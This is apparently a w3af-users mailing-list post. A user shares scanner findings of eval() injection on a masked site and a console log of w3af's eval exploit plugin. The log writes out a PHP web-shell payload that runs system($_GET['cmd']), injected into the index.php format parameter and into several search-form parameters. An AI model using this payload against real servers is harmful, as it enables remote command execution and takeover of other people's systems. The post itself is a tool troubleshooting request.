*This is what i get when i scanning:*
eval() input injection was found at: "http://www.*.*.*.*/index.php";, using
HTTP method GET. The sent data was: "format=echo+'hwlGz'+.+'hmyxk'%3B". This
vulnerability was found in the request with id 3503.
GET http://www.*.*.*.*/index.php?format=echo+'hwlGz'+.+'hmyxk'%3B HTTP/1.1
Accept-encoding: identity
Accept: */*
User-agent: w3af.sourceforge.net
Host: www.*.*.*.*
Referer: http:www.*.*.*.*/
Cookie: path=/, ja_sanidineii_light_tpl=ja_sanidineii_light; path=/;
expires=Mon, 22-Aug-2011 05:15:31 GMT;
d78b7e97c61f57a1bb044966cb321828=662af586260d792ccc6ccc092b6e2815;
*
and: *
eval() input injection was found at: "http://www.*.*.*.*/component/search/";,
using HTTP method POST. The sent post-data was:
"ordering=newest&task=search&areas%5B%5D=content&searchword=Hello+World&searchphrase=Response.Write("hwlGz%2Bhmyxk")".
The modified parameter was "searchphrase". This vulnerability was found in
the request with id 3837.
GET
http://www.*.*.*.*/component/search/?ordering=newest&areas%5B0%5D=content&searchword=Hello+World&searchphrase=ResponseWritehwlGzhmyxk
HTTP/1.1
Accept-encoding: identity
Accept: */*
User-agent: w3af.sourceforge.net
Host: www.*.*.*.*
Referer: http://www.*.*.*.*/
Cookie: d78b7e97c61f57a1bb044966cb321828=662af586260d792ccc6ccc092b6e2815;
ja_sanidineii_light_tpl=ja_sanidineii_light
Content-type: application/x-www-form-urlencoded
*this *is what i get when i exploit:
Checking suitability...
Ok, exploiting...
Done
*and in the console:*
eval exploit plugin is starting.
Called buildOpeners
keepalive: The connection manager has 0 active connections.
keepalive: added one connection, len(self._hostmap["www.*.*.*.*"]): 1
Cached DNS response for domain: www.*.*.*.*
keepalive: removed one connection, len(self._hostmap["www.*.*.*.*"]):
GET http://www.*.*.*.*/index.php?format=if+(+strcmp(+%24_GET%5B'cmd'%5D
2C+""+)+==+0+)%7B%0A++++echo+"15825b40c6dace2a"+.+"7cf5d4ab8ed434d5"%3B%0A%7Del
e%7B%0A++++system+(+%24_GET%5B'cmd'%5D+)%3B%0A%7D returned HTTP code "500" -
id
10084
keepalive: The connection manager has 0 active connections.
keepalive: added one connection, len(self._hostmap["www.*.*.*.*"]): 1
Cached DNS response for domain: www.*.*.*.*
keepalive: The connection manager has 1 active connections.
POST http://www.*.*.*.*/component/search/ with data: "ordering=newest&t
sk=search&areas[]=content&searchword=Hello World&searchphrase=if ( strcmp(
$_GE
['cmd'], "" ) == 0 ){
echo "15825b40c6dace2a" . "7cf5d4ab8ed434d5";
}else{
system ( $_GET['cmd'] );
}" returned HTTP code "200" - id: 10086
keepalive: The connection manager has 1 active connections.
keepalive: The connection manager has 1 active connections.
POST http://www.*.*.*.*/component/search/ with data: "ordering=if ( str
mp( $_GET['cmd'], "" ) == 0 ){
echo "15825b40c6dace2a" . "7cf5d4ab8ed434d5";
}else{
system ( $_GET['cmd'] );
}&task=search&areas[]=content&searchword=Hello World&searchphrase=all"
returned
HTTP code "200" - id: 10088
keepalive: The connection manager has 1 active connections.
keepalive: The connection manager has 1 active connections.
POST http://www.*.*.*.*/component/search/ with data: "ordering=newest&t
sk=search&areas[]=if ( strcmp( $_GET['cmd'], "" ) == 0 ){
echo "15825b40c6dace2a" . "7cf5d4ab8ed434d5";
}else{
system ( $_GET['cmd'] );
}&searchword=Hello World&searchphrase=all" returned HTTP code "200" - id:
10090
*
thanks
*
------------------------------------------------------------------------------
This SF.net Dev2Dev email is sponsored by:
Show off your parallel programming skills.
Enter the Intel(R) Threading Challenge 2010.
http://p.sf.net/sfu/intel-thread-sfd
_______________________________________________
W3af-users mailing list
[email protected]
https://lists.sourceforge.net/lists/listinfo/w3af-users
